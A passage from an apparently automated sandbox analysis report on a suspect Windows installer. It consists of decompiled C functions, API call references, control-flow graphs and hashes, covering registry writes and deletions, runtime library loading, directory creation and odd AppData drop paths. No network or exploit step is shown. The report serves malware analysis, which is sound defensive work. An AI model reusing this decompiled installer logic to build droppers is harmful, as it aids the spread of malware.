                                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402DFB
                                                            • RegCloseKey.ADVAPI32(?), ref: 00402E06
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CloseEnum$DeleteValue
                                                            • String ID:
                                                            • API String ID: 1354259210-0
                                                            • Opcode ID: 0b70125d2885548f0ad194bbca3c62b33980be104f870c091c4e8a98a002eebf
                                                            • Instruction ID: d48e4a71bfa48a15fd7248f9ae3dc224302ba9e6f67c9eaa91d5645e55e2e307
                                                            • Opcode Fuzzy Hash: 0b70125d2885548f0ad194bbca3c62b33980be104f870c091c4e8a98a002eebf
                                                            • Instruction Fuzzy Hash: D9213771500108BADF129F90CE89EEB7B7DEF44344F10047AFA15B11A0D7B49EA4AAA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 966 40247e-4024af call 402c39 * 2 call 402cc9 973 402ac5-402ad4 966->973 974 4024b5-4024bf 966->974 975 4024c1-4024ce call 402c39 lstrlenA 974->975 976 4024cf-4024d2 974->976 975->976 979 4024d4-4024e8 call 402c17 976->979 980 4024e9-4024ec 976->980 979->980 984 4024fd-402511 RegSetValueExA 980->984 985 4024ee-4024f8 call 403143 980->985 988 402513 984->988 989 402516-4025f3 RegCloseKey 984->989 985->984 988->989 989->973
                                                            C-Code - Quality: 83%
                                                            			E0040247E(void* __eax, int __ebx, intOrPtr __edx) {
                                                            				void* _t18;
                                                            				void* _t19;
                                                            				int _t22;
                                                            				long _t23;
                                                            				int _t28;
                                                            				intOrPtr _t31;
                                                            				void* _t32;
                                                            				intOrPtr _t35;
                                                            				void* _t37;
                                                            				void* _t40;
                                                            
                                                            				_t31 = __edx;
                                                            				_t28 = __ebx;
                                                            				_t35 =  *((intOrPtr*)(_t37 - 0x18));
                                                            				_t32 = __eax;
                                                            				 *(_t37 - 0x38) =  *(_t37 - 0x14);
                                                            				 *(_t37 - 0x78) = E00402C39(2);
                                                            				_t18 = E00402C39(0x11);
                                                            				 *(_t37 - 4) = 1;
                                                            				_t19 = E00402CC9(_t40, _t32, _t18, 2); // executed
                                                            				 *(_t37 + 8) = _t19;
                                                            				if(_t19 != __ebx) {
                                                            					_t22 = 0;
                                                            					if(_t35 == 1) {
                                                            						E00402C39(0x23);
                                                            						_t22 = lstrlenA(0x40e438) + 1;
                                                            					}
                                                            					if(_t35 == 4) {
                                                            						 *0x40e438 = E00402C17(3);
                                                            						 *((intOrPtr*)(_t37 - 0x88)) = _t31;
                                                            						_t22 = _t35;
                                                            					}
                                                            					if(_t35 == 3) {
                                                            						_t22 = E00403143( *((intOrPtr*)(_t37 - 0x1c)), _t28, 0x40e438, 0x6000);
                                                            					}
                                                            					_t23 = RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x78), _t28,  *(_t37 - 0x38), 0x40e438, _t22); // executed
                                                            					if(_t23 == 0) {
                                                            						 *(_t37 - 4) = _t28;
                                                            					}
                                                            					_push( *(_t37 + 8));
                                                            					RegCloseKey();
                                                            				}
                                                            				 *0x4524a8 =  *0x4524a8 +  *(_t37 - 4);
                                                            				return 0;
                                                            			}














                                                            APIs
                                                            • lstrlenA.KERNEL32(0040E438,00000023,00000011,00000002), ref: 004024C9
                                                            • RegSetValueExA.KERNEL32(?,?,?,?,0040E438,00000000), ref: 00402509
                                                            • RegCloseKey.ADVAPI32(?), ref: 004025ED
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CloseValuelstrlen
                                                            • String ID: 8@
                                                            • API String ID: 2655323295-819625340
                                                            • Opcode ID: 65587d1442390afad9897b2e89eb803fe651756d21c2971c27c9d1827eb7d305
                                                            • Instruction ID: 5c472bfcd106fad06d1ca2f2b491726f83d19557c2f496224d1fecae1d857e91
                                                            • Opcode Fuzzy Hash: 65587d1442390afad9897b2e89eb803fe651756d21c2971c27c9d1827eb7d305
                                                            • Instruction Fuzzy Hash: C3115E71E04208BEEB10AFA5DE49AAEBA74AB44714F20443BF505B71C1D6B98D909B68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 991 4020a5-4020b1 992 4020b7-4020cd call 402c39 * 2 991->992 993 40216c-40216e 991->993 1002 4020dc-4020ea LoadLibraryExA 992->1002 1003 4020cf-4020da GetModuleHandleA 992->1003 995 4022e5-4022ea call 401423 993->995 1001 402ac5-402ad4 995->1001 1005 4020ec-4020f9 GetProcAddress 1002->1005 1006 402165-402167 1002->1006 1003->1002 1003->1005 1008 402138-40213d call 405378 1005->1008 1009 4020fb-402101 1005->1009 1006->995 1013 402142-402145 1008->1013 1011 402103-40210f call 401423 1009->1011 1012 40211a-402136 1009->1012 1011->1013 1022 402111-402118 1011->1022 1012->1013 1013->1001 1016 40214b-402153 call 4039dd 1013->1016 1016->1001 1021 402159-402160 FreeLibrary 1016->1021 1021->1001 1022->1013
                                                            C-Code - Quality: 60%
                                                            			E004020A5(void* __ebx, void* __eflags) {
                                                            				struct HINSTANCE__* _t18;
                                                            				struct HINSTANCE__* _t26;
                                                            				void* _t27;
                                                            				struct HINSTANCE__* _t30;
                                                            				CHAR* _t32;
                                                            				intOrPtr* _t33;
                                                            				void* _t34;
                                                            
                                                            				_t27 = __ebx;
                                                            				asm("sbb eax, 0x4524e0");
                                                            				 *(_t34 - 4) = 1;
                                                            				if(__eflags < 0) {
                                                            					_push(0xffffffe7);
                                                            					L15:
                                                            					E00401423();
                                                            					L16:
                                                            					 *0x4524a8 =  *0x4524a8 +  *(_t34 - 4);
                                                            					return 0;
                                                            				}
                                                            				_t32 = E00402C39(0xfffffff0);
                                                            				 *(_t34 + 8) = E00402C39(1);
                                                            				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                                                            					L3:
                                                            					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
                                                            					_t30 = _t18;
                                                            					if(_t30 == _t27) {
                                                            						_push(0xfffffff6);
                                                            						goto L15;
                                                            					}
                                                            					L4:
                                                            					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                                            					if(_t33 == _t27) {
                                                            						E00405378(0xfffffff7,  *(_t34 + 8));
                                                            					} else {
                                                            						 *(_t34 - 4) = _t27;
                                                            						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                                                            							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x2000, 0x453000, 0x414478, 0x40a000);
                                                            						} else {
                                                            							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                                                            							if( *_t33() != 0) {
                                                            								 *(_t34 - 4) = 1;
                                                            							}
                                                            						}
                                                            					}
                                                            					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004039DD(_t30) != 0) {
                                                            						FreeLibrary(_t30);
                                                            					}
                                                            					goto L16;
                                                            				}
                                                            				_t26 = GetModuleHandleA(_t32); // executed
                                                            				_t30 = _t26;
                                                            				if(_t30 != __ebx) {
                                                            					goto L4;
                                                            				}
                                                            				goto L3;
                                                            			}











                                                            APIs
                                                            • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020D0
                                                              • Part of subcall function 00405378: lstrlenA.KERNEL32(Copy failed,00000000,0042CE48,7555110C,?,?,?,?,?,?,?,?,?,0040329E,00000000,?), ref: 004053B1
                                                              • Part of subcall function 00405378: lstrlenA.KERNEL32(0040329E,Copy failed,00000000,0042CE48,7555110C,?,?,?,?,?,?,?,?,?,0040329E,00000000), ref: 004053C1
                                                              • Part of subcall function 00405378: lstrcatA.KERNEL32(Copy failed,0040329E,0040329E,Copy failed,00000000,0042CE48,7555110C), ref: 004053D4
                                                              • Part of subcall function 00405378: SetWindowTextA.USER32(Copy failed,Copy failed), ref: 004053E6
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 0040540C
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 00405426
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 00405434
                                                            • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020E0
                                                            • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 004020F0
                                                            • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,00000000,?,?,00000008,00000001,000000F0), ref: 0040215A
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                            • String ID:
                                                            • API String ID: 2987980305-0
                                                            • Opcode ID: e0f3fc95b655b74265502013fc270037f478b43415bc26c37f640848bae1994c
                                                            • Instruction ID: c32ea7a8b3beed88709fb5878bffd466afe3d741a829a911a3d786ad6d955be5
                                                            • Opcode Fuzzy Hash: e0f3fc95b655b74265502013fc270037f478b43415bc26c37f640848bae1994c
                                                            • Instruction Fuzzy Hash: 30210831904215F7DF206FA48F4DAAF3A606F45359F20423BF601B61D1DBFD49819A6E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1023 40583e-405889 CreateDirectoryA 1024 40588b-40588d 1023->1024 1025 40588f-40589c GetLastError 1023->1025 1026 4058b6-4058b8 1024->1026 1025->1026 1027 40589e-4058b2 SetFileSecurityA 1025->1027 1027->1024 1028 4058b4 GetLastError 1027->1028 1028->1026
                                                            C-Code - Quality: 100%
                                                            			E0040583E(CHAR* _a4) {
                                                            				struct _SECURITY_ATTRIBUTES _v16;
                                                            				struct _SECURITY_DESCRIPTOR _v36;
                                                            				int _t22;
                                                            				long _t23;
                                                            
                                                            				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                            				_v36.Owner = 0x408384;
                                                            				_v36.Group = 0x408384;
                                                            				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                            				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                            				_v16.lpSecurityDescriptor =  &_v36;
                                                            				_v36.Revision = 1;
                                                            				_v36.Control = 4;
                                                            				_v36.Dacl = 0x408374;
                                                            				_v16.nLength = 0xc;
                                                            				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
                                                            				if(_t22 != 0) {
                                                            					L1:
                                                            					return 0;
                                                            				}
                                                            				_t23 = GetLastError();
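                                                            				if(_t23 == 0xb7) { // 0xb7 = ERROR_ALREADY_EXISTS
                                                            					// 0x80000007 = OWNER | GROUP | DACL | PROTECTED_DACL_SECURITY_INFORMATION
                                                            					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {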
                                                            						goto L1;
                                                            					}
                                                            					return GetLastError();
                                                            				}
                                                            				return _t23;
                                                            			}








                                                            APIs
                                                            • CreateDirectoryA.KERNELBASE(?,0000000B,00485000), ref: 00405881
                                                            • GetLastError.KERNEL32 ref: 00405895
                                                            • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004058AA
                                                            • GetLastError.KERNEL32 ref: 004058B4
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                            • String ID:
                                                            • API String ID: 3449924974-0
                                                            • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                            • Instruction ID: 2f5b217c954ff7fbb4119b01485a045b77912d3f79ec2e58d5a645a6a403fb95
                                                            • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                            • Instruction Fuzzy Hash: A7010872C00219EAEF00DBA1C944BEFBBB8EF04355F00803AD945B6290E7789658CB99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 87%
                                                            			E004015BB(char __ebx, void* __eflags) {
                                                            				void* _t13;
                                                            				int _t19;
                                                            				char _t21;
                                                            				void* _t22;
                                                            				char _t23;
                                                            				signed char _t24;
                                                            				char _t26;
                                                            				CHAR* _t28;
                                                            				char* _t32;
                                                            				void* _t33;
                                                            
                                                            				_t26 = __ebx;
                                                            				_t28 = E00402C39(0xfffffff0);
                                                            				_t13 = E00405C82(_t28);
                                                            				_t30 = _t13;
                                                            				if(_t13 != __ebx) {
                                                            					do {
                                                            						_t32 = E00405C14(_t30, 0x5c);
                                                            						_t21 =  *_t32;
                                                            						 *_t32 = _t26;
                                                            						 *((char*)(_t33 + 0xb)) = _t21;
                                                            						if(_t21 != _t26) {
                                                            							L5:
                                                            							_t22 = E004058BB(_t28);
                                                            						} else {
                                                            							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
                                                            							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004058D8(_t39) == 0) {
                                                            								goto L5;
                                                            							} else {
                                                            								_t22 = E0040583E(_t28); // executed
                                                            							}
                                                            						}
                                                            						if(_t22 != _t26) {
                                                            							if(_t22 != 0xb7) {
                                                            								L9:
                                                            								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                            							} else {
                                                            								_t24 = GetFileAttributesA(_t28); // executed
                                                            								if((_t24 & 0x00000010) == 0) {
                                                            									goto L9;
                                                            								}
                                                            							}
                                                            						}
                                                            						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                                                            						 *_t32 = _t23;
                                                            						_t30 = _t32 + 1;
                                                            					} while (_t23 != _t26);
                                                            				}
                                                            				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
                                                            					_push(0xfffffff5);
                                                            					E00401423();
                                                            				} else {
                                                            					E00401423(0xffffffe6);
                                                            					E00406257("C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes", _t28);
                                                            					_t19 = SetCurrentDirectoryA(_t28); // executed
                                                            					if(_t19 == 0) {
                                                            						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                            					}
                                                            				}
                                                            				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t33 - 4));
                                                            				return 0;
                                                            			}














                                                            APIs
                                                              • Part of subcall function 00405C82: CharNextA.USER32(?), ref: 00405C90
                                                              • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405C95
                                                              • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405CA9
                                                            • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                              • Part of subcall function 0040583E: CreateDirectoryA.KERNELBASE(?,0000000B,00485000), ref: 00405881
                                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes,00000000,00000000,000000F0), ref: 0040163C
                                                            Strings
                                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes, xrefs: 00401631
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes
                                                            • API String ID: 1892508949-4054825685
                                                            • Opcode ID: e8121ef37ac2678a0a0bc0c1c4f9116077d9be17d0c59d1929bed76540fc0f84
                                                            • Instruction ID: b8fbfff880949599704ab61e7222ee5c33c04614f7d3c61f622f7c10b59fc28f
                                                            • Opcode Fuzzy Hash: e8121ef37ac2678a0a0bc0c1c4f9116077d9be17d0c59d1929bed76540fc0f84
                                                            • Instruction Fuzzy Hash: 21110431508141ABDF307BA54D405BF27B49A96324B28453FF9D1B22E3DA3D4942AA3E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00405E19(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                            				char _t11;
                                                            				signed int _t12;
                                                            				int _t15;
                                                            				signed int _t17;
                                                            				void* _t20;
                                                            				CHAR* _t21;
                                                            
                                                            				_t21 = _a4;
                                                            				_t20 = 0x64;
                                                            				while(1) {
                                                            					_t11 =  *0x40a3d4; // 0x61736e
                                                            					_t20 = _t20 - 1;
                                                            					_a4 = _t11;
                                                            					_t12 = GetTickCount();
                                                            					_t17 = 0x1a;
                                                            					_a6 = _a6 + _t12 % _t17;
                                                            					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
                                                            					if(_t15 != 0) {
                                                            						break;
                                                            					}
                                                            					if(_t20 != 0) {
                                                            						continue;
                                                            					}
                                                            					 *_t21 =  *_t21 & 0x00000000;
                                                            					return _t15;
                                                            				}
                                                            				return _t21;
                                                            			}










                                                            APIs
                                                            • GetTickCount.KERNEL32(75572754,00485000,?,004033B1,00483000,00485000,00485000,00485000,00485000,00485000,00485000,00403690,?,00000007,00000009,0000000B), ref: 00405E2D
                                                            • GetTempFileNameA.KERNEL32(0000000B,?,00000000,?), ref: 00405E47
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CountFileNameTempTick
                                                            • String ID: nsa
                                                            • API String ID: 1716503409-2209301699
                                                            • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                            • Instruction ID: db84433a099d66a6ad53f3418d19e52f8fbd3804b66164b4918815a523437c08
                                                            • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                            • Instruction Fuzzy Hash: 9CF0A736348208BBEB109F56ED04B9B7B9CDF91B50F10C03BFA84DB180D6B5DA548798
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 59%
                                                            			E00401B87(void* __ebx, void* __edx) {
                                                            				intOrPtr _t7;
                                                            				void* _t8;
                                                            				void _t11;
                                                            				void* _t13;
                                                            				void* _t21;
                                                            				void* _t24;
                                                            				void* _t30;
                                                            				void* _t33;
                                                            				void* _t34;
                                                            				char* _t36;
                                                            				void* _t37;
                                                            
                                                            				_t27 = __ebx;
                                                            				_t7 =  *((intOrPtr*)(_t37 - 0x20));
                                                            				_t30 =  *0x414478; // 0x0
                                                            				if(_t7 == __ebx) {
                                                            					if(__edx == __ebx) {
                                                            						_t8 = GlobalAlloc(0x40, 0x2004); // executed
                                                            						_t34 = _t8;
                                                            						_t4 = _t34 + 4; // 0x4
                                                            						E004062EA(__ebx, _t30, _t34, _t4,  *((intOrPtr*)(_t37 - 0x28)));
                                                            						_t11 =  *0x414478; // 0x0
                                                            						 *_t34 = _t11;
                                                            						 *0x414478 = _t34;
                                                            					} else {
                                                            						if(_t30 == __ebx) {
                                                            							 *((intOrPtr*)(_t37 - 4)) = 1;
                                                            						} else {
                                                            							_t2 = _t30 + 4; // 0x4
                                                            							E00406257(_t33, _t2);
                                                            							_push(_t30);
                                                            							 *0x414478 =  *_t30;
                                                            							GlobalFree();
                                                            						}
                                                            					}
                                                            					goto L15;
                                                            				} else {
                                                            					while(1) {
                                                            						_t7 = _t7 - 1;
                                                            						if(_t30 == _t27) {
                                                            							break;
                                                            						}
                                                            						_t30 =  *_t30;
                                                            						if(_t7 != _t27) {
                                                            							continue;
                                                            						} else {
                                                            							if(_t30 == _t27) {
                                                            								break;
                                                            							} else {
                                                            								_t32 = _t30 + 4;
                                                            								_t36 = "C:\\Users\\Albus\\Raped\\Forbundskansleres.nav";
                                                            								E00406257(_t36, _t30 + 4);
                                                            								_t21 =  *0x414478; // 0x0
                                                            								E00406257(_t32, _t21 + 4);
                                                            								_t24 =  *0x414478; // 0x0
                                                            								_push(_t36);
                                                            								_push(_t24 + 4);
                                                            								E00406257();
                                                            								L15:
                                                            								 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t37 - 4));
                                                            								_t13 = 0;
                                                            							}
                                                            						}
                                                            						goto L17;
                                                            					}
                                                            					_push(0x200010);
                                                            					_push(E004062EA(_t27, _t30, _t33, _t27, 0xffffffe8));
                                                            					E0040596D();
                                                            					_t13 = 0x7fffffff;
                                                            				}
                                                            				L17:
                                                            				return _t13;
                                                            			}














                                                            APIs
                                                            • GlobalFree.KERNEL32(00000000), ref: 00401BF6
                                                            • GlobalAlloc.KERNELBASE(00000040,00002004), ref: 00401C08
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$AllocFree
                                                            • String ID: C:\Users\user\Raped\Forbundskansleres.nav
                                                            • API String ID: 3394109436-1324439229
                                                            • Opcode ID: ef51e244c9b72e316efee3d40e69dbbd1feb408e9613f1d734bb71ffb8df92b4
                                                            • Instruction ID: d2b80980e39293206c5e6d60a34a0b6bee3a2bd2daddf4a89311edae202359af
                                                            • Opcode Fuzzy Hash: ef51e244c9b72e316efee3d40e69dbbd1feb408e9613f1d734bb71ffb8df92b4
                                                            • Instruction Fuzzy Hash: 3E215E72600100A7E720FBA4DD89D9E73A59B89319B25443FF152F72D1D77CD8518B2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 59%
                                                            			E00401389(signed int _a4) {
                                                            				intOrPtr* _t6;
                                                            				void* _t8;
                                                            				void* _t10;
                                                            				signed int _t11;
                                                            				void* _t12;
                                                            				signed int _t16;
                                                            				signed int _t17;
                                                            				void* _t18;
                                                            
                                                            				_t17 = _a4;
                                                            				while(_t17 >= 0) {
                                                            					_t6 = _t17 * 0x1c +  *0x452450;
                                                            					if( *_t6 == 1) {
                                                            						break;
                                                            					}
                                                            					_push(_t6); // executed
                                                            					_t8 = E00401434(); // executed
                                                            					if(_t8 == 0x7fffffff) {
                                                            						return 0x7fffffff;
                                                            					}
                                                            					_t10 = E0040136D(_t8);
                                                            					if(_t10 != 0) {
                                                            						_t11 = _t10 - 1;
                                                            						_t16 = _t17;
                                                            						_t17 = _t11;
                                                            						_t12 = _t11 - _t16;
                                                            					} else {
                                                            						_t12 = _t10 + 1;
                                                            						_t17 = _t17 + 1;
                                                            					}
                                                            					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                            						 *0x44e40c =  *0x44e40c + _t12;
                                                            						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x44e40c, 0x7530,  *0x44e3f4), 0); // executed
                                                            					}
                                                            				}
                                                            				return 0;
                                                            			}











                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 8ffdd9807c9e9fea2b97bbb89bab772424fd2da09bf17e16083ab72da1b50c14
                                                            • Instruction ID: 797ac5eab5bd55ce3963157cabd24902f5215075ef1b0f0e1f2fe658c051a2dc
                                                            • Opcode Fuzzy Hash: 8ffdd9807c9e9fea2b97bbb89bab772424fd2da09bf17e16083ab72da1b50c14
                                                            • Instruction Fuzzy Hash: 0A01D1316242209BE7094B399D08B2A3798F711318F10823FB851F61F1D678CC129B4C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00402429(void* __ebx, void* __edx) {
                                                            				long _t6;
                                                            				void* _t13;
                                                            				long _t18;
                                                            				void* _t20;
                                                            				void* _t22;
                                                            				void* _t23;
                                                            
                                                            				_t13 = __ebx;
                                                            				_t26 =  *(_t23 - 0x18) - __ebx;
                                                            				_t20 = __edx;
                                                            				if( *(_t23 - 0x18) != __ebx) {
                                                            					_t6 = E00402CF7(_t20, E00402C39(0x22),  *(_t23 - 0x18) >> 1); // executed
                                                            					_t18 = _t6;
                                                            					goto L4;
                                                            				} else {
                                                            					_t22 = E00402C79(_t26, 2);
                                                            					if(_t22 == __ebx) {
                                                            						L6:
                                                            						 *((intOrPtr*)(_t23 - 4)) = 1;
                                                            					} else {
                                                            						_t18 = RegDeleteValueA(_t22, E00402C39(0x33));
                                                            						RegCloseKey(_t22);
                                                            						L4:
                                                            						if(_t18 != _t13) {
                                                            							goto L6;
                                                            						}
                                                            					}
                                                            				}
                                                            				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t23 - 4));
                                                            				return 0;
                                                            			}









                                                            APIs
                                                            • RegDeleteValueA.ADVAPI32(00000000,00000000), ref: 0040244A
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402453
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CloseDeleteValue
                                                            • String ID:
                                                            • API String ID: 2831762973-0
                                                            • Opcode ID: 89f34967f54b2aac586cece147ae45f43d1fae16bd496501fa127636accbe786
                                                            • Instruction ID: 34235f3b1f430fbf497285b3b61430caa7c9be3a8a673b0b08f99ec2f467b38a
                                                            • Opcode Fuzzy Hash: 89f34967f54b2aac586cece147ae45f43d1fae16bd496501fa127636accbe786
                                                            • Instruction Fuzzy Hash: 4FF0F632A04120ABE710ABB49B8E9AE62A89B40314F25043FF202B31C1DAF84D41966E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 50%
                                                            			E0040544A(signed int __eax) {
                                                            				intOrPtr _v0;
                                                            				intOrPtr _t10;
                                                            				intOrPtr _t11;
                                                            				intOrPtr* _t12;
                                                            
                                                            				_t11 =  *0x452448;
                                                            				_t10 =  *0x45244c;
                                                            				__imp__OleInitialize(0); // executed
                                                            				 *0x4524e0 =  *0x4524e0 | __eax;
                                                            				E00404320(0);
                                                            				if(_t10 != 0) {
                                                            					_t12 = _t11 + 0xc;
                                                            					while(1) {
                                                            						_t10 = _t10 - 1;
                                                            						if(( *(_t12 - 4) & 0x00000001) != 0 && E00401389( *_t12, _v0) != 0) {
                                                            							break;
                                                            						}
                                                            						_t12 = _t12 + 0x2018;
                                                            						if(_t10 != 0) {
                                                            							continue;
                                                            						} else {
                                                            						}
                                                            						goto L7;
                                                            					}
                                                            					 *0x4524ac =  *0x4524ac + 1;
                                                            				}
                                                            				L7:
                                                            				E00404320(0x404);
                                                            				__imp__OleUninitialize();
                                                            				return  *0x4524ac;
                                                            			}








                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 0040545A
                                                              • Part of subcall function 00404320: SendMessageA.USER32 ref: 00404332
                                                            • OleUninitialize.OLE32 ref: 004054A6
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: InitializeMessageSendUninitialize
                                                            • String ID:
                                                            • API String ID: 2896919175-0
                                                            • Opcode ID: 26a39bb3d1c59b8153bbe96717fa75530bfd0ef50f002ce5e2fc391db5d8019d
                                                            • Instruction ID: 605ee913eaad74fb131c45803b2287184ab1d6587fbed753920360c824042bb4
                                                            • Opcode Fuzzy Hash: 26a39bb3d1c59b8153bbe96717fa75530bfd0ef50f002ce5e2fc391db5d8019d
                                                            • Instruction Fuzzy Hash: 43F0F073500B00ABE6409704EE01BAA7360EB82317F09403BEE44722A2D7B588458A5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00401A1E(char __ebx) {
                                                            				CHAR* _t7;
                                                            				long _t8;
                                                            				char _t12;
                                                            				CHAR* _t17;
                                                            				void* _t19;
                                                            
                                                            				_t12 = __ebx;
                                                            				_t7 = E00402C39(1);
                                                            				 *(_t19 + 8) = _t7;
                                                            				_t8 = ExpandEnvironmentStringsA(_t7, _t17, 0x2000); // executed
                                                            				if(_t8 == 0 ||  *((intOrPtr*)(_t19 - 0x20)) != __ebx && lstrcmpA( *(_t19 + 8), _t17) == 0) {
                                                            					 *((intOrPtr*)(_t19 - 4)) = 1;
